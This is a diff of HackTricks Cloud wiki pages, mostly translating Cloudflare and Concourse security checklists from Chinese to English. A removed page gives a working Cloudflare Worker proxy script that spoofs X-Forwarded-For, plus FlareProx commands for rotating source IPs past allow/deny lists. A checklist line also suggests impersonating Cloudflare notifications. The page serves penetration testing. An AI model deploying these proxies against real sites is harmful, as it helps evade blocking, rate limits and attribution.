- [ ] Configure **CORS Policy**.
## Stream
@@ -76,8 +70,8 @@ TODO
## Security Center
- [ ] 如果可能,运行一次 **`Security Insights`** 扫描和一次 **`Infrastructure`** 扫描,它们会突出显示对安全有价值的信息。
- [ ] 检查这些信息以发现安全误配置和有趣的情报。
- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise.
- [ ] Just **check this information** for security misconfigurations and interesting info
## Turnstile
@@ -92,49 +86,52 @@ cloudflare-zero-trust-network.md
## Bulk Redirects
> [!NOTE]
> [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/) 不同, [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) 本质上是静态的——**不支持任何字符串替换操作或正则表达式**。不过,你可以配置影响其 URL 匹配行为和运行时行为的 URL redirect 参数。
> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
- [ ] 检查重定向的 **expressions** **requirements** 是否合理。
- [ ] 也检查是否存在包含有价值信息的 **敏感隐藏端点**
- [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info.
## Notifications
- [ ] 检查 **notifications**。以下通知推荐用于安全监控:
- `Usage Based Billing`
- `HTTP DDoS Attack Alert`
- `Layer 3/4 DDoS Attack Alert`
- `Advanced HTTP DDoS Attack Alert`
- `Advanced Layer 3/4 DDoS Attack Alert`
- `Flow-based Monitoring: Volumetric Attack`
- `Route Leak Detection Alert`
- `Access mTLS Certificate Expiration Alert`
- `SSL for SaaS Custom Hostnames Alert`
- `Universal SSL Alert`
- `Script Monitor New Code Change Detection Alert`
- `Script Monitor New Domain Alert`
- `Script Monitor New Malicious Domain Alert`
- `Script Monitor New Malicious Script Alert`
- `Script Monitor New Malicious URL Alert`
- `Script Monitor New Scripts Alert`
- `Script Monitor New Script Exceeds Max URL Length Alert`
- `Advanced Security Events Alert`
- `Security Events Alert`
- [ ] 检查所有 **destinations**,因为 webhook urls 中可能包含敏感信息(如 basic http auth。同时确保 webhook urls 使用 **HTTPS**
- [ ] 作为额外检查,你可以尝试 **冒充一个 cloudflare notification** 发给第三方,看看是否能以某种方式 **注入危险内容**
- [ ] Check the **notifications.** These notifications are recommended for security:
- `Usage Based Billing`
- `HTTP DDoS Attack Alert`
- `Layer 3/4 DDoS Attack Alert`
- `Advanced HTTP DDoS Attack Alert`
- `Advanced Layer 3/4 DDoS Attack Alert`
- `Flow-based Monitoring: Volumetric Attack`
- `Route Leak Detection Alert`
- `Access mTLS Certificate Expiration Alert`
- `SSL for SaaS Custom Hostnames Alert`
- `Universal SSL Alert`
- `Script Monitor New Code Change Detection Alert`
- `Script Monitor New Domain Alert`
- `Script Monitor New Malicious Domain Alert`
- `Script Monitor New Malicious Script Alert`
- `Script Monitor New Malicious URL Alert`
- `Script Monitor New Scripts Alert`
- `Script Monitor New Script Exceeds Max URL Length Alert`
- `Advanced Security Events Alert`
- `Security Events Alert`
- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS**
- [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous**
## Manage Account
- [ ] **`Billing` -> `Payment info`** 中可以看到信用卡的 **后 4 位**、**到期时间** 和 **账单地址**
- [ ] **`Billing` -> `Subscriptions`** 中可以看到账户使用的 **plan type**
- [ ] **`Members`** 中可以看到账户的所有成员及其 **role**。注意如果 plan type 不是 Enterprise,只有两个角色:Administrator Super Administrator。但如果使用的是 **Enterprise** plan可以使用[**更多角色**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/)以遵循最小权限原则。
- 因此,尽可能建议使用 **Enterprise plan**
- [ ] Members 中可以检查哪些 **members** 启用了 **2FA**。**每个**用户都应启用 2FA。
- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
- Therefore, whenever possible is **recommended** to use the **Enterprise plan**.
- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled.
> [!NOTE]
> 注意幸运的是,角色 **`Administrator`** 并不授予管理成员的权限(**无法提升权限或邀请** 新成员)
> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
## DDoS Investigation
[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,31 +2,31 @@
{{#include ../../banners/hacktricks-training.md}}
在每个配置在 Cloudflare 的 TLD 中,有一些 **通用设置和服务** 可以配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
<figure><img src="../../images/image (101).png" alt=""><figcaption></figcaption></figure>
### 概述
### Overview
- [ ] 了解账户 **服务的使用程度**
- [ ] 还要找到 **区域 ID****账户 ID**
- [ ] Get a feeling of **how much** are the services of the account **used**
- [ ] Find also the **zone ID** and the **account ID**
### 分析
### Analytics
- [ ] **`安全`** 中检查是否有 **速率限制**
- [ ] In **`Security`** check if there is any **Rate limiting**
### DNS
- [ ] 检查 DNS **记录** 中的 **有趣**(敏感?)数据
- [ ] 检查可能包含 **敏感信息****子域名**,仅基于 **名称**(如 admin173865324.domin.com
- [ ] 检查 **未被代理** 的网页
- [ ] 检查可以通过 CNAME 或 IP 地址 **直接访问的代理网页**
- [ ] 检查 **DNSSEC** 是否 **启用**
- [ ] 检查所有 CNAME 是否 **使用 CNAME 扁平化**
- 这可能有助于 **隐藏子域名接管漏洞** 并改善加载时间
- [ ] 检查域名 [**是否易受欺骗**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html#mail-spoofing)
- [ ] Check **interesting** (sensitive?) data in DNS **records**
- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com)
- [ ] Check for web pages that **aren't** **proxied**
- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address
- [ ] Check that **DNSSEC** is **enabled**
- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
- This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html#mail-spoofing)
### **电子邮件**
### **Email**
TODO
@@ -36,91 +36,91 @@ TODO
### SSL/TLS
#### **概述**
#### **Overview**
- [ ] **SSL/TLS 加密** 应该是 **完全** **完全(严格)**。任何其他设置将在某些时候发送 **明文流量**
- [ ] **SSL/TLS 推荐器** 应该启用
- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
- [ ] The **SSL/TLS Recommender** should be enabled
#### 边缘证书
#### Edge Certificates
- [ ] **始终使用 HTTPS** 应该 **启用**
- [ ] **HTTP 严格传输安全(HSTS** 应该 **启用**
- [ ] **最低 TLS 版本应为 1.2**
- [ ] **TLS 1.3 应该启用**
- [ ] **自动 HTTPS 重写** 应该 **启用**
- [ ] **证书透明度监控** 应该 **启用**
- [ ] **Always Use HTTPS** should be **enabled**
- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
- [ ] **Minimum TLS Version should be 1.2**
- [ ] **TLS 1.3 should be enabled**
- [ ] **Automatic HTTPS Rewrites** should be **enabled**
- [ ] **Certificate Transparency Monitoring** should be **enabled**
### **安全**
### **Security**
- [ ] **`WAF`** 部分,检查 **防火墙** **速率限制规则是否被使用** 以防止滥用是很有趣的。
- **`绕过`** 操作将 **禁用 Cloudflare 安全** 功能。它不应该被使用。
- [ ] **`页面保护`** 部分,如果使用了任何页面,建议检查它是否 **启用**
- [ ] **`API 保护`** 部分,如果在 Cloudflare 中暴露了任何 API建议检查它是否 **启用**
- [ ] **`DDoS`** 部分,建议启用 **DDoS 保护**
- [ ] **`设置`** 部分:
- [ ] 检查 **`安全级别`** 是否为 **中等** 或更高
- [ ] 检查 **`挑战通过`** 最多为 1 小时
- [ ] 检查 **`浏览器完整性检查`** 是否 **启用**
- [ ] 检查 **`隐私通行证支持`** 是否 **启用**
- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
- The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
- [ ] In the **`Settings`** section:
- [ ] Check that the **`Security Level`** is **medium** or greater
- [ ] Check that the **`Challenge Passage`** is 1 hour at max
- [ ] Check that the **`Browser Integrity Check`** is **enabled**
- [ ] Check that the **`Privacy Pass Support`** is **enabled**
#### **CloudFlare DDoS 保护**
#### **CloudFlare DDoS Protection**
- 如果可以,启用 **机器人战斗模式** **超级机器人战斗模式**。如果您保护某个通过编程访问的 API例如从 JS 前端页面),您可能无法在不破坏该访问的情况下启用此功能。
- **WAF**:您可以根据 URL 路径创建 **速率限制** 或对 **已验证的机器人**(速率限制规则),或根据 IP、Cookie、引荐来源等 **阻止访问**。因此,您可以阻止不来自网页或没有 Cookie 的请求。
- 如果攻击来自 **已验证的机器人**,至少 **添加速率限制** 到机器人。
- 如果攻击是针对 **特定路径**,作为预防机制,在该路径中添加 **速率限制**
- 您还可以在 WAF 的 **工具****白名单** IP 地址、IP 范围、国家或 ASN。
- 检查 **托管规则** 是否也可以帮助防止漏洞利用。
- **工具** 部分,您可以 **阻止或对特定 IP 和用户代理发出挑战**
- DDoS 中,您可以 **覆盖某些规则以使其更严格**
- **设置**:将 **安全级别** 设置为 ****,如果您处于攻击中并且 **浏览器完整性检查已启用**,则设置为 **正在攻击**
- Cloudflare Domains -> Analytics -> Security -> 检查 **速率限制** 是否启用
- Cloudflare Domains -> Security -> Events -> 检查 **检测到的恶意事件**
- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
- If the attack is from a **verified bot**, at least **add a rate limit** to bots.
- If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
- You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
- Check if **Managed rules** could also help to prevent vulnerability exploitations.
- In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.**
- In DDoS you could **override some rules to make them more restrictive**.
- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**.
- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
### 访问
### Access
{{#ref}}
cloudflare-zero-trust-network.md
{{#endref}}
### 速度
### Speed
_我找不到与安全相关的任何选项_
_I couldn't find any option related to security_
### 缓存
### Caching
- [ ] **`配置`** 部分考虑启用 **CSAM 扫描工具**
- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
### **Workers 路由**
### **Workers Routes**
_您应该已经检查过_ [_cloudflare workers_](#workers)
_You should have already checked_ [_cloudflare workers_](#workers)
### 规则
### Rules
TODO
### 网络
### Network
- [ ] 如果 **`HTTP/2`** **启用**,则 **`HTTP/2 到源`** 应该 **启用**
- [ ] **`HTTP/3 (使用 QUIC)`** 应该 **启用**
- [ ] 如果 **用户****隐私** 重要,请确保 **`洋葱路由`** **启用**
- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
- [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
### **流量**
### **Traffic**
TODO
### 自定义页面
### Custom Pages
- [ ] 当触发与安全相关的错误时(如阻止、速率限制或我正在攻击模式),配置自定义页面是可选的
- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
### 应用
### Apps
TODO
### Scrape Shield
- [ ] 检查 **电子邮件地址模糊化** 是否 **启用**
- [ ] 检查 **服务器端排除** 是否 **启用**
- [ ] Check **Email Address Obfuscation** is **enabled**
- [ ] Check **Server-side Excludes** is **enabled**
### **Zaraz**
@@ -131,3 +131,6 @@ TODO
TODO
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,286 +0,0 @@
# 滥用 Cloudflare Workers 作为 pass-through proxies (IP rotation, FireProx-style)
{{#include ../../banners/hacktricks-training.md}}
Cloudflare Workers 可以部署为透明的 HTTP 透传代理upstream 目标 URL 由客户端提供。请求从 Cloudflare 的网络外发,因此目标只会看到 Cloudflare 的 IP 而不是客户端的。这与在 AWS API Gateway 上广为人知的 FireProx 技术类似,但使用的是 Cloudflare Workers。
### 主要功能
- 支持所有 HTTP 方法 (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)
- 目标可以通过查询参数 (?url=...)、一个 header (X-Target-URL),或甚至编码在路径中(例如 /https://target提供
- Headers 和 body 会被透传,按需进行 hop-by-hop/头 过滤
- 响应被中继回客户端,保留状态码和大部分 header
- 可选地伪造 X-Forwarded-For如果 Worker 从受控 header 设置它)
- 通过部署多个 Worker 端点并扇出请求可以实现非常快速/容易的轮换
### 工作原理(流程)
1) 客户端向 Worker URL 发送 HTTP 请求(`<name>.<account>.workers.dev` 或自定义域路由)。
2) Worker 从查询参数 (?url=...)、X-Target-URL header或实现的路径段中提取目标。
3) Worker 将传入的方法、headers 和 body 转发到指定的 upstream URL过滤有问题的 header
4) Upstream 响应通过 Cloudflare 流式回传给客户端;原始服务器看到的是 Cloudflare 的外发 IP。
### Worker 实现示例
- 从查询参数、header 或路径读取目标 URL
- 复制一组安全的 header 并转发原始方法/body
- 可选地使用用户可控的 header (X-My-X-Forwarded-For) 或随机 IP 设置 X-Forwarded-For
- 添加宽松的 CORS 并处理 preflight
<details>
<summary>示例 WorkerJavaScript用于透传代理</summary>
```javascript
/**
* Minimal Worker pass-through proxy
* - Target URL from ?url=, X-Target-URL, or /https://...
* - Proxies method/headers/body to upstream; relays response
*/
addEventListener('fetch', event => {
event.respondWith(handleRequest(event.request))
})
async function handleRequest(request) {
try {
const url = new URL(request.url)
const targetUrl = getTargetUrl(url, request.headers)
if (!targetUrl) {
return errorJSON('No target URL specified', 400, {
usage: {
query_param: '?url=https://example.com',
header: 'X-Target-URL: https://example.com',
path: '/https://example.com'
}
})
}
let target
try { target = new URL(targetUrl) } catch (e) {
return errorJSON('Invalid target URL', 400, { provided: targetUrl })
}
// Forward original query params except control ones
const passthru = new URLSearchParams()
for (const [k, v] of url.searchParams) {
if (!['url', '_cb', '_t'].includes(k)) passthru.append(k, v)
}
if (passthru.toString()) target.search = passthru.toString()
// Build proxied request
const proxyReq = buildProxyRequest(request, target)
const upstream = await fetch(proxyReq)
return buildProxyResponse(upstream, request.method)
} catch (error) {
return errorJSON('Proxy request failed', 500, {
message: error.message,
timestamp: new Date().toISOString()
})
}
}
function getTargetUrl(url, headers) {
let t = url.searchParams.get('url') || headers.get('X-Target-URL')
if (!t && url.pathname !== '/') {
const p = url.pathname.slice(1)
if (p.startsWith('http')) t = p
}
return t
}
function buildProxyRequest(request, target) {
const h = new Headers()
const allow = [
'accept','accept-language','accept-encoding','authorization',
'cache-control','content-type','origin','referer','user-agent'
]
for (const [k, v] of request.headers) {
if (allow.includes(k.toLowerCase())) h.set(k, v)
}
h.set('Host', target.hostname)
// Optional: spoof X-Forwarded-For if provided
const spoof = request.headers.get('X-My-X-Forwarded-For')
h.set('X-Forwarded-For', spoof || randomIP())
return new Request(target.toString(), {
method: request.method,
headers: h,
body: ['GET','HEAD'].includes(request.method) ? null : request.body
})
}
function buildProxyResponse(resp, method) {
const h = new Headers()
for (const [k, v] of resp.headers) {
if (!['content-encoding','content-length','transfer-encoding'].includes(k.toLowerCase())) {
h.set(k, v)
}
}
// Permissive CORS for tooling convenience
h.set('Access-Control-Allow-Origin', '*')
h.set('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE, OPTIONS, PATCH, HEAD')
h.set('Access-Control-Allow-Headers', '*')
if (method === 'OPTIONS') return new Response(null, { status: 204, headers: h })
return new Response(resp.body, { status: resp.status, statusText: resp.statusText, headers: h })
}
function errorJSON(msg, status=400, extra={}) {
return new Response(JSON.stringify({ error: msg, ...extra }), {
status, headers: { 'Content-Type': 'application/json' }
})
}
function randomIP() { return [1,2,3,4].map(() => Math.floor(Math.random()*255)+1).join('.') }
```
</details>
### 使用 FlareProx 自动化部署和轮换
FlareProx 是一个 Python 工具,使用 Cloudflare API 部署多个 Worker endpoints 并在它们之间轮换。这在 Cloudflare 的网络上提供了类似 FireProx 的 IP rotation。
设置
1) 使用 “Edit Cloudflare Workers” 模板创建一个 Cloudflare API Token并从仪表板获取你的 Account ID。
2) 配置 FlareProx
```bash
git clone https://github.com/MrTurvey/flareprox
cd flareprox
pip install -r requirements.txt
```
**创建配置文件 flareprox.json:**
```json
{
"cloudflare": {
"api_token": "your_cloudflare_api_token",
"account_id": "your_cloudflare_account_id"
}
}
```
**CLI 使用**
- 创建 N Worker proxies:
```bash
python3 flareprox.py create --count 2
```
- 列出端点:
```bash
python3 flareprox.py list
```
- 健康检查端点:
```bash
python3 flareprox.py test
```
- 删除所有端点:
```bash
python3 flareprox.py cleanup
```
**通过 Worker 路由流量**
- 查询参数形式:
```bash
curl "https://your-worker.account.workers.dev?url=https://httpbin.org/ip"
```
- 标头格式:
```bash
curl -H "X-Target-URL: https://httpbin.org/ip" https://your-worker.account.workers.dev
```
- 路径形式 (如果已实现):
```bash
curl https://your-worker.account.workers.dev/https://httpbin.org/ip
```
- 方法示例:
```bash
# GET
curl "https://your-worker.account.workers.dev?url=https://httpbin.org/get"
# POST (form)
curl -X POST -d "username=admin" \
"https://your-worker.account.workers.dev?url=https://httpbin.org/post"
# PUT (JSON)
curl -X PUT -d '{"username":"admin"}' -H "Content-Type: application/json" \
"https://your-worker.account.workers.dev?url=https://httpbin.org/put"
# DELETE
curl -X DELETE \
"https://your-worker.account.workers.dev?url=https://httpbin.org/delete"
```
**`X-Forwarded-For` 控制**
如果 Worker 支持 `X-My-X-Forwarded-For`,你可以影响上游的 `X-Forwarded-For` 值:
```bash
curl -H "X-My-X-Forwarded-For: 203.0.113.10" \
"https://your-worker.account.workers.dev?url=https://httpbin.org/headers"
```
**以编程方式使用**
使用 FlareProx 库来创建/列出/测试 endpoints 并从 Python 路由请求。
<details>
<summary>Python 示例:通过随机 Worker endpoint 发送 POST 请求</summary>
```python
#!/usr/bin/env python3
from flareprox import FlareProx, FlareProxError
import json
# Initialize
flareprox = FlareProx(config_file="flareprox.json")
if not flareprox.is_configured:
print("FlareProx not configured. Run: python3 flareprox.py config")
exit(1)
# Ensure endpoints exist
endpoints = flareprox.sync_endpoints()
if not endpoints:
print("Creating proxy endpoints...")
flareprox.create_proxies(count=2)
# Make a POST request through a random endpoint
try:
post_data = json.dumps({
"username": "testuser",
"message": "Hello from FlareProx!",
"timestamp": "2025-01-01T12:00:00Z"
})
headers = {
"Content-Type": "application/json",
"User-Agent": "FlareProx-Client/1.0"
}
response = flareprox.redirect_request(
target_url="https://httpbin.org/post",
method="POST",
headers=headers,
data=post_data
)
if response.status_code == 200:
result = response.json()
print("✓ POST successful via FlareProx")
print(f"Origin IP: {result.get('origin', 'unknown')}")
print(f"Posted data: {result.get('json', {})}")
else:
print(f"Request failed with status: {response.status_code}")
except FlareProxError as e:
print(f"FlareProx error: {e}")
except Exception as e:
print(f"Request error: {e}")
```
</details>
**Burp/Scanner 集成**
- 将工具(例如 Burp Suite指向 Worker URL。
- 使用 ?url= 或 X-Target-URL 提供真实 upstream。
- HTTP 语义methods/headers/body会被保留同时将你的源 IP 隐藏在 Cloudflare 之后。
**操作注意事项和限制**
- Cloudflare Workers Free 计划大约允许每个账号每天 100,000 请求;如有需要,可使用多个 endpoints 来分散流量。
- Workers 在 Cloudflare 的网络上运行;许多目标只会看到 Cloudflare 的 IPs/ASN这可能绕过简单的 IP 允许/拒绝 列表或基于地理位置的启发式判断。
- 请负责任地使用,并且仅在获得授权的情况下使用。遵守 ToS 和 robots.txt。
## 参考资料
- [FlareProx (Cloudflare Workers pass-through/rotation)](https://github.com/MrTurvey/flareprox)
- [Cloudflare Workers fetch() API](https://developers.cloudflare.com/workers/runtime-apis/fetch/)
- [Cloudflare Workers pricing and free tier](https://developers.cloudflare.com/workers/platform/pricing/)
- [FireProx (AWS API Gateway)](https://github.com/ustayready/fireprox)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,43 +2,43 @@
{{#include ../../banners/hacktricks-training.md}}
**Cloudflare Zero Trust Network** 账户中,有一些 **设置和服务** 可以进行配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
<figure><img src="../../images/image (206).png" alt=""><figcaption></figcaption></figure>
### Analytics
- [ ] 有助于 **了解环境**
- [ ] Useful to **get to know the environment**
### **Gateway**
- [ ] **`Policies`** 中,可以生成策略以 **限制** 通过 **DNS**、**网络** 或 **HTTP** 请求访问应用程序的用户。
- 如果使用,**策略** 可以创建以 **限制** 访问恶意网站。
- **仅在使用网关时相关**,如果不使用,则没有理由创建防御性策略。
- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
- If used, **policies** could be created to **restrict** the access to malicious sites.
- This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
### Access
#### Applications
在每个应用程序上:
On each application:
- [ ] 检查 **** 可以访问该应用程序的 **Policies**,并确保 **只有** 需要访问该应用程序的 **用户** 可以访问。
- 要允许访问,将使用 **`Access Groups`**(也可以设置 **附加规则**
- [ ] 检查 **可用的身份提供者**,确保它们 **不太开放**
- [ ] **`Settings`** 中:
- [ ] 检查 **CORS 未启用**(如果启用,检查它是否 **安全**,并且不允许所有内容)
- [ ] Cookies 应具有 **Strict Same-Site** 属性,**HTTP Only** 和 **绑定 cookie** 应在应用程序为 HTTP 时 **启用**
- [ ] 考虑启用 **浏览器渲染** 以获得更好的 **保护。更多信息请参见** [**远程浏览器隔离**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)****
- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access.
- To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
- [ ] Check the **available identity providers** and make sure they **aren't too open**
- [ ] In **`Settings`**:
- [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
- [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP.
- [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
#### **Access Groups**
- [ ] 检查生成的访问组是否 **正确限制** 了它们应该允许的用户。
- [ ] 特别重要的是检查 **默认访问组不太开放****不允许太多人**),因为 **默认情况下****组** 中的任何人都将能够 **访问应用程序**
- 请注意,可以给 **每个人** 和其他 **非常开放的政策** 赋予 **访问权限**,除非 100% 必要,否则不推荐。
- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
- Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
#### Service Auth
- [ ] 检查所有服务令牌 **在 1 年或更短时间内过期**
- [ ] Check that all service tokens **expires in 1 year or less**
#### Tunnels
@@ -50,12 +50,15 @@ TODO
### Logs
- [ ] 您可以搜索用户的 **意外操作**
- [ ] You could search for **unexpected actions** from users
### Settings
- [ ] 检查 **计划类型**
- [ ] 可以查看 **信用卡持有者姓名**、**最后 4 位数字**、**到期** 日期和 **地址**
- [ ] 建议 **添加用户座位到期** 以移除不真正使用此服务的用户
- [ ] Check the **plan type**
- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address**
- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,32 +2,35 @@
{{#include ../../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
Concourse 允许您 **构建管道** 以在需要时自动运行测试、操作和构建镜像(基于时间,或在发生某些事情时...
Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
## Concourse 架构
## Concourse Architecture
了解 concourse 环境的结构在:
Learn how the concourse environment is structured in:
{{#ref}}
concourse-architecture.md
{{#endref}}
## Concourse 实验室
## Concourse Lab
了解如何在本地运行 concourse 环境以进行您自己的测试在:
Learn how you can run a concourse environment locally to do your own tests in:
{{#ref}}
concourse-lab-creation.md
{{#endref}}
## 枚举与攻击 Concourse
## Enumerate & Attack Concourse
了解如何枚举 concourse 环境并滥用它在:
Learn how you can enumerate the concourse environment and abuse it in:
{{#ref}}
concourse-enumeration-and-attacks.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -4,7 +4,9 @@
## Concourse Architecture
[**来自Concourse文档的相关数据**](https://concourse-ci.org/internals.html)
[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
### Architecture
@@ -12,27 +14,29 @@
#### ATC: web UI & build scheduler
ATC是Concourse的核心。它运行**web UI和API**,并负责所有管道**调度**。它**连接到PostgreSQL**,用于存储管道数据(包括构建日志)。
The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
[checker](https://concourse-ci.org/checker.html)的职责是持续检查资源的新版本。[scheduler](https://concourse-ci.org/scheduler.html)负责为作业调度构建,而[build tracker](https://concourse-ci.org/build-tracker.html)负责运行任何已调度的构建。[garbage collector](https://concourse-ci.org/garbage-collector.html)是用于清理任何未使用或过时对象(如容器和卷)的机制。
The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
#### TSA: worker registration & forwarding
TSA是一个**自定义构建的SSH服务器**,仅用于安全地**注册**[**workers**](https://concourse-ci.org/internals.html#architecture-worker)[ATC](https://concourse-ci.org/internals.html#component-atc)
The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
TSA默认监听端口`2222`,通常与[ATC](https://concourse-ci.org/internals.html#component-atc)共同放置,并位于负载均衡器后面。
The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
**TSA通过SSH连接实现CLI**支持[**这些命令**](https://concourse-ci.org/internals.html#component-tsa)。
The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
#### Workers
为了执行任务Concourse必须有一些workers。这些workers通过[TSA](https://concourse-ci.org/internals.html#component-tsa)进行**自我注册**,并运行服务[**Garden**](https://github.com/cloudfoundry-incubator/garden)[**Baggageclaim**](https://github.com/concourse/baggageclaim)
In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
- **Garden**:这是**容器管理API**,通常通过**HTTP**在**端口7777**上运行。
- **Baggageclaim**:这是**卷管理API**,通常通过**HTTP**在**端口7788**上运行。
- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
## References
- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -6,47 +6,49 @@
### 用户角色与权限
### User Roles & Permissions
Concourse 具有五个角色:
Concourse comes with five roles:
- _Concourse_ **管理员**:此角色仅授予 **主团队**(默认初始 concourse 团队)的所有者。管理员可以 **配置其他团队**(例如:`fly set-team``fly destroy-team`...)。此角色的权限无法通过 RBAC 进行影响。
- **所有者**:团队所有者可以 **修改团队内的所有内容**
- **成员**:团队成员可以在 **团队资产****读取和写入**,但不能修改团队设置。
- **管道操作员**:管道操作员可以执行 **管道操作**,例如触发构建和固定资源,但不能更新管道配置。
- **查看者**:团队查看者对团队及其管道具有 **“只读”** 访问权限。
